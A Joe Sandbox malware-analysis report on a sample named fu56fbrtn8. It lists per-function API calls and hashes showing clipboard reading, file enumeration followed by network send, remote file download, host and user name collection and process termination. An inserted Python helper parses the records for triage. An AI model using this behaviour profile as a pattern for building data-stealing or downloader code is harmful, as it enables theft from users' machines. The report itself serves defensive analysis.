• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
• Opcode ID: 765ed17e0d0e76392ba8b5e3ebbf16138c7b18f65d61a833a14bb10a1f900adc
• Instruction ID: c9cd6440e4200da4cc2e3fb2a99a394c553e19c4b9dbf7fa270f7f4056da7a9b
• Opcode Fuzzy Hash: 765ed17e0d0e76392ba8b5e3ebbf16138c7b18f65d61a833a14bb10a1f900adc
• Instruction Fuzzy Hash: D761A471A143079BDB28DF24CC81BAAF7A9FF04320F1085B9EE55C6944EB74E981DB90
Uniqueness
Uniqueness Score: -1.00%

APIs
• CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,156B34BF,00000034,?,?,00000000), ref: 156B3849
• CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,156B3552,00000000,?,00000000), ref: 156B385F
• CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,156B3552,00000000,?,00000000,1569E251), ref: 156B3871
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
• Opcode ID: c18adcc90e19f005b34187daa74e6d6d75700cc730dd9b201f3edd59aeaf1a5d
• Instruction ID: 872220176c23ac0e18fbe561b69cd69e939a5546545b353df7642eb820660a5b
• Opcode Fuzzy Hash: c18adcc90e19f005b34187daa74e6d6d75700cc730dd9b201f3edd59aeaf1a5d
• Instruction Fuzzy Hash: DEE09231718261BAE7304E26AC08F463A6AEB81770F21093DFA55E40D4D7A28404C7D5
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(00000000,?,156C328B,00000000,156EE948,0000000C,156C33E2,00000000,00000002,00000000), ref: 156C32D6
• TerminateProcess.KERNEL32(00000000,?,156C328B,00000000,156EE948,0000000C,156C33E2,00000000,00000002,00000000), ref: 156C32DD
• ExitProcess.KERNEL32 ref: 156C32EF
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 94672a0f77573be6173bded8b3e3c9f45fb6cd6be9d6ae1b53fdfafe2d2c71c0
• Instruction ID: 949fe7169815f9ce522aa4341bb529d149ff4359b158fdb85e43397ca0cdfea1
• Opcode Fuzzy Hash: 94672a0f77573be6173bded8b3e3c9f45fb6cd6be9d6ae1b53fdfafe2d2c71c0
• Instruction Fuzzy Hash: 95E0BF31521258ABCF216F64C949A983B6EFF40256F004458FD4A46625CF3AEA42CAC4
Uniqueness
Uniqueness Score: -1.00%

APIs
• OpenClipboard.USER32(00000000), ref: 1568B711
• GetClipboardData.USER32(0000000D), ref: 1568B71D
• CloseClipboard.USER32 ref: 1568B725
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseDataOpen
• String ID:
• API String ID: 2058664381-0
• Opcode ID: 6c0d773b1b0af2c33175bc174be5cc04fee4e11494fe1b8391bda14a9558917c
• Instruction ID: 35a2d580b0669b9861b0388167b5ef5304d2ce29ea96c24de6c93837f53a7943
• Opcode Fuzzy Hash: 6c0d773b1b0af2c33175bc174be5cc04fee4e11494fe1b8391bda14a9558917c
• Instruction Fuzzy Hash: 7AE0EC3565A7209FC7109A609C88F9E6A59AF55F61F82891CFC869A194CB309800C7E1
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 156B4C6B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-3916222277
• Opcode ID: 38b1f878dd1ae0f733fc6235e5d65c82e8f3cf555a8801e3a43d6c0dd900c48e
• Instruction ID: 7931d0e5662e9b557fa1a321efabafea7d4cd1c3de257e5472a52b2d7a142fa2
• Opcode Fuzzy Hash: 38b1f878dd1ae0f733fc6235e5d65c82e8f3cf555a8801e3a43d6c0dd900c48e
• Instruction Fuzzy Hash: B15169B1E14219DBEB14CF65C4D169ABBF9FB48355F20816ED816EB240D7B49A00CFE0
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: a7c17e100ee4bcd18cad788e9ca3916bd76082232eba794403c8ce031b650919
• Instruction ID: 778d88d59dbb25136ba4db42a4d0eff6f754745057339fa4ea35805adb3db989
• Opcode Fuzzy Hash: a7c17e100ee4bcd18cad788e9ca3916bd76082232eba794403c8ce031b650919
• Instruction Fuzzy Hash: 6B312876900159AFCB15CE78CC84EEA7BBEEF45314F0002E9E859D7291E630AD45CBD0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,156C44CA,?,00000004), ref: 156C8940
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx
• API String ID: 2299586839-2904428671
• Opcode ID: 69a2c37c97b1557d71d6fe33430bc15bc2e8c4d50368da7f9ce4a8dce21a9bb7
• Instruction ID: e4097950e4b211245da65c14be88dc804198189b5338b7cac2929b396f5c921d
• Opcode Fuzzy Hash: 69a2c37c97b1557d71d6fe33430bc15bc2e8c4d50368da7f9ce4a8dce21a9bb7
• Instruction Fuzzy Hash: 55F09635A0121CF7CB119F64CC44EAEBB6AEF58661F004A99FC5567250CF316D10DAD9
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
• Instruction ID: 76cc8c5821608f37a15f65042a4fb9e33461e8958883fdb4036565fa04917d89
• Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
• Instruction Fuzzy Hash: A6020A71E012199BDF14CFADC88069DB7B1FF88324F2582AAD919E7384D731AE41CB95
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 15687857
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 1568791F
  • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: FileFind$FirstNextsend
• String ID:
• API String ID: 4113138495-0
• Opcode ID: 167cf14790be9969fe3e4eee11eaea23ca97df22ad7d134952818e71039f3663
• Instruction ID: 7a6a9cfc5d5abf77d3754e9699248e54b71d2ed093d960969f6c44093d499b21
• Opcode Fuzzy Hash: 167cf14790be9969fe3e4eee11eaea23ca97df22ad7d134952818e71039f3663
• Instruction Fuzzy Hash: 73218D3660A3459BC714EB60D894DEFB7ACAF90324F800D1DE59653190EF35BA09CAE6
Uniqueness

Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32 ref: 15696640
• URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 156966A2
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: DownloadFileSleep
• String ID:
• API String ID: 1931167962-0
• Opcode ID: 1f0ce62594cd7b928e7cc4b5ff42b02bd13a314997707ddf11655d776faf8202
• Instruction ID: cb521a8504788c53152a69d115f62df16e525dea8fc0771d7badccc3960acca7
• Opcode Fuzzy Hash: 1f0ce62594cd7b928e7cc4b5ff42b02bd13a314997707ddf11655d776faf8202
• Instruction Fuzzy Hash: DB119079B0A3469FC718EF70CCA59BE73E9AF51204F440C2DE58292281EF30B908C6D6
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetComputerNameExW.KERNEL32(00000001,?,0000002B,156F50E4), ref: 1569B62A
• GetUserNameW.ADVAPI32(?,1568F223), ref: 1569B642
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Name$ComputerUser
• String ID:
• API String ID: 4229901323-0
• Opcode ID: 02eee1ac232bc7f75f215f322f91a2aa8809f9602dc8df912fe4785c7a22202f
• Instruction ID: b3a2202af304b6efe098c11f585e76705af3ae917ffcd52aab343070cf8b6667
• Opcode Fuzzy Hash: 02eee1ac232bc7f75f215f322f91a2aa8809f9602dc8df912fe4785c7a22202f
• Instruction Fuzzy Hash: CD014F75A0121CABCB10DBD4DC54ADDB7BCAF04305F10015AE405A6150EF707A89CBE4
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,15691F37,?,?,?,?,00000000), ref: 156920E7
• HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 156920EE
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: b214187a7f75824f7caad5250487fa1177722e850c714118873df07abdcbfcd7
• Instruction ID: 34042a1f55925fcac5a20be494dcb34ff5d1397003533b40d585e2cfd540cfe8
• Opcode Fuzzy Hash: b214187a7f75824f7caad5250487fa1177722e850c714118873df07abdcbfcd7
• Instruction Fuzzy Hash: 3A113532505A12EFCB349F64DD88827BBEAFF04621301882EE19756821CB72F890DB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,156D3326,?,?,00000008,?,?,156D61DD,00000000), ref: 156D3558
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 906af5ec5ba56fa046794e4886ee46cab547c08eb19cc500842579f516f585ba
• Instruction ID: 801dd445a50b4370284e16339ed6f2e839f8259de701a3ea2b1b5fe602fb3277
• Opcode Fuzzy Hash: 906af5ec5ba56fa046794e4886ee46cab547c08eb19cc500842579f516f585ba
• Instruction Fuzzy Hash: 96B15C716147099FD705CF28C486B68BBE0FF45365F258A58E8DACF2A1C739E991CB80
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: cabcd2f59a54c4024e0914ba878c5e3260e726e5f3ec9c6a847880ebfd970970
• Instruction ID: 87a51122327ff24baec74357ed56c0105ad1189acb77529d223df0f420b14222
• Opcode Fuzzy Hash: cabcd2f59a54c4024e0914ba878c5e3260e726e5f3ec9c6a847880ebfd970970
• Instruction Fuzzy Hash: 3D123836B093008BD754CF69D851A1FB3E2BFCC754F15892DE985AB290DA74F805CB8A
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
  • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
  • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
  • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
  • Part of subcall function 156C8215: _free.LIBCMT ref: 156C8274
  • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8281
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 156D2367
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale_abort
• String ID:
• API String ID: 1663032902-0
• Opcode ID: 41f0b85667676e4f1408e77c22b7e9ac1650053d64dbbdad1db3a5e3cdd17b2d
• Instruction ID: 13594e60a03e0b0645db930d9715548de0b492445806b2a9d949f4dcfc844903
• Opcode Fuzzy Hash: 41f0b85667676e4f1408e77c22b7e9ac1650053d64dbbdad1db3a5e3cdd17b2d
• Instruction Fuzzy Hash: 5A21C236A1131AABDB248E24CC41FAAB3ADFF04720F1105BAED41D6540EB75B980DBE0
Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

APIs
  • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
  • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
  • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
  • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
• EnumSystemLocalesW.KERNEL32(156D20C3,00000001,00000000,?,156C4A6C,?,156D26F0,00000000,?,?,?), ref: 156D200D
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: e91b461f45197e2120b7f3f869a14352acc2083f94e9b0de30499240971c6458
• Instruction ID: affdff97a6d476873b19d6df0c598309eaaf7b3b6616a7894242f49a55dc3260
• Opcode Fuzzy Hash: e91b461f45197e2120b7f3f869a14352acc2083f94e9b0de30499240971c6458
• Instruction Fuzzy Hash: DF110C3B6007059FD7189F39C890ABAF792FF84368B14492DD98747B40D775B542C790
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02DE7FB1
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
• Opcode ID: b0f2a126e6bfdbec3624709fe996a37f07710e4d7c3479fe4a57f6dc015cd93b
• Instruction ID: 13219e94f9d8928c816d1c2f47f3340c58630cdaf2fed018a60707949b058820
• Opcode Fuzzy Hash: b0f2a126e6bfdbec3624709fe996a37f07710e4d7c3479fe4a57f6dc015cd93b
• Instruction Fuzzy Hash: A4110CB5E00209AFDB00DF99C8819AFF7F9EFC8300F14C569A509E7354E6319E018BA0
Uniqueness
Uniqueness Score: -1.00%
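Added example, not part of the Joe Sandbox report and not Joe Sandbox's own code: a small Python triage helper for records in the text form used on this page. It parses each record's direct and subcall APIs, decodes the memory-dump file name, and separates functions that only do locale/CRT start-up work from the ones worth a look. The three sample records are copied from this page with their argument lists shortened. Two things are assumptions of mine: that the dump name carries the region base followed by the MEMORY_BASIC_INFORMATION Protect, State and Type values (inferred from the values seen here, 0x40, 0x1000 and 0x20000, not from any documented naming scheme), and the list of "boilerplate" APIs, which is a heuristic I chose.

```python
"""Triage helper for Joe Sandbox per-function records (added example, not Joe Sandbox code)."""
import re

# Constructed sample: three records copied from this page, argument lists shortened.
SAMPLE = """\
APIs
  • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720), ref: 156C8219
  • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
• EnumSystemLocalesW.KERNEL32(156D20C3,00000001,00000000), ref: 156D200D
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• API String ID: 1084509184-0
Uniqueness Score: -1.00%

APIs
• GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02DE7FB1
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• API String ID: 1705453755-0

APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DEA79E
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• API String ID: 2299586839-0
"""

# Constants from winnt.h (MEMORY_BASIC_INFORMATION Protect / State / Type).
# ASSUMPTION: the dump name holds base, Protect, State, Type in fields 4-7;
# inferred from the values on this page (0x40, 0x1000, 0x20000), not documented.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Heuristic list (mine, not the report's): APIs the MSVC CRT and Delphi RTL call
# during their own start-up; a function that calls only these is noise for triage.
LOCALE_BOILERPLATE = {"GetLocaleInfoW", "GetLocaleInfoA", "EnumSystemLocalesW",
                      "EnumSystemLocalesA", "IsValidLocale", "IsValidCodePage", "GetACP",
                      "GetOEMCP", "GetCPInfo", "LCMapStringW", "GetUserDefaultLCID",
                      "GetLastError", "SetLastError"}

API_RE = re.compile(r"^• (?:Part of subcall function (?P<fn>[0-9A-F]+): )?"
                    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\(.*?\))?,? ref: (?P<ref>[0-9A-F]+)$")
SRC_RE = re.compile(r"^• Source File: (?P<name>\S+), Offset: (?P<base>[0-9A-F]+), "
                    r"based on PE: (?P<pe>true|false)$")
KV_RE = re.compile(r"^• (?P<key>[^:]+): ?(?P<val>.*)$")


def decode_dump_name(name):
    """Split '<...>.<base>.<protect>.<state>.<type>.<...>.sdmp' into named fields."""
    parts = name.rsplit(".", 1)[0].split(".")
    base, protect, state, kind = (int(p, 16) for p in parts[3:7])
    return {"base": base, "protect": PAGE_PROTECT.get(protect, hex(protect)),
            "state": MEM_STATE.get(state, hex(state)), "type": MEM_TYPE.get(kind, hex(kind))}


def parse_records(text):
    """One dict per blank-line-separated record: direct APIs, subcall APIs, dump, fields."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {"apis": [], "subcalls": [], "fields": {}}
        for raw in chunk.splitlines():
            line = raw.strip()
            if m := API_RE.match(line):
                entry = {"api": m["api"], "module": m["mod"], "ref": int(m["ref"], 16)}
                (rec["subcalls"] if m["fn"] else rec["apis"]).append(entry)
            elif m := SRC_RE.match(line):
                rec["dump"] = decode_dump_name(m["name"])
                rec["base"] = int(m["base"], 16)
                rec["pe_backed"] = m["pe"] == "true"
            elif m := KV_RE.match(line):
                rec["fields"][m["key"]] = m["val"]
            elif line.startswith("Uniqueness Score:"):
                rec["fields"]["Uniqueness Score"] = line.split(":", 1)[1].strip()
        records.append(rec)
    return records


def is_boilerplate(rec):
    """True when every direct call of the function is start-up locale noise."""
    return bool(rec["apis"]) and all(a["api"] in LOCALE_BOILERPLATE for a in rec["apis"])


def triage(records):
    """Group by module base; count noise, collect other calls, flag RWX private PE images."""
    out = {}
    for rec in records:
        if "base" not in rec:
            continue
        s = out.setdefault(rec["base"], {"region": rec["dump"], "pe_backed": rec["pe_backed"],
                                        "functions": 0, "boilerplate": 0, "calls": set()})
        s["functions"] += 1
        if is_boilerplate(rec):
            s["boilerplate"] += 1
        else:
            s["calls"].update(a["api"] for a in rec["apis"])
    for s in out.values():
        r = s["region"]
        # A PE image sitting in private RWX memory was written there by the process itself.
        s["unpacked_rwx_image"] = (s["pe_backed"] and r["protect"] == "PAGE_EXECUTE_READWRITE"
                                   and r["type"] == "MEM_PRIVATE")
    return out


if __name__ == "__main__":
    for base, s in sorted(triage(parse_records(SAMPLE)).items()):
        print(f"{base:08X} {s['region']['protect']:<22} {s['region']['type']:<11} "
              f"funcs={s['functions']} noise={s['boilerplate']} "
              f"rwx_image={s['unpacked_rwx_image']} calls={sorted(s['calls'])}")
```

Run with python3 and it prints one line per module base. Under the field-layout assumption above, the sample's 0x15680000 region decodes as PAGE_EXECUTE_READWRITE in MEM_PRIVATE memory with a PE header at its base, which is the shape of a payload the process unpacked into memory at run time, while the 0x02DE0000 module's code page is PAGE_EXECUTE_READ. Of its two functions, only the GetDiskFreeSpaceA caller survives the boilerplate filter. On a full report the same filter removes most of the EnumSystemLocalesW/GetLocaleInfoW entries, which in a Microsoft CRT build are the runtime's own locale initialisation rather than anything the malware author wrote.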

APIs
  • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
  • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
  • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
  • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,156D22E1,00000000,00000000,?), ref: 156D256F
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ErrorLast$InfoLocale_abort_free
• String ID:
• API String ID: 2692324296-0
• Opcode ID: 0485839e86c3b15c40ceb25ff81d5a11d606e5c4b3363e585e3d42a4ebb03e00
• Instruction ID: 19f7063dcf2bd97d55b23e280448e32c7af080cc43406593f792229805919410
• Opcode Fuzzy Hash: 0485839e86c3b15c40ceb25ff81d5a11d606e5c4b3363e585e3d42a4ebb03e00
• Instruction Fuzzy Hash: 04F04932E10316ABD7244B20C815FBAB76AFB403B4F004868EC96A3540EB75FD51C6E0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
  • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
  • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
  • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
• EnumSystemLocalesW.KERNEL32(156D2313,00000001,?,?,156C4A6C,?,156D26B4,156C4A6C,?,?,?,?,?,156C4A6C,?,?), ref: 156D2082
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: 5ad9319eabd7ee1c6799c6c0214e7fc85e4162511359f2ef399b88213dd06cca
• Instruction ID: a47ebe0bd7e726c01aed05ccab97bd3f7fd0c3c6444a0b9067035ac1a296a1c4
• Opcode Fuzzy Hash: 5ad9319eabd7ee1c6799c6c0214e7fc85e4162511359f2ef399b88213dd06cca
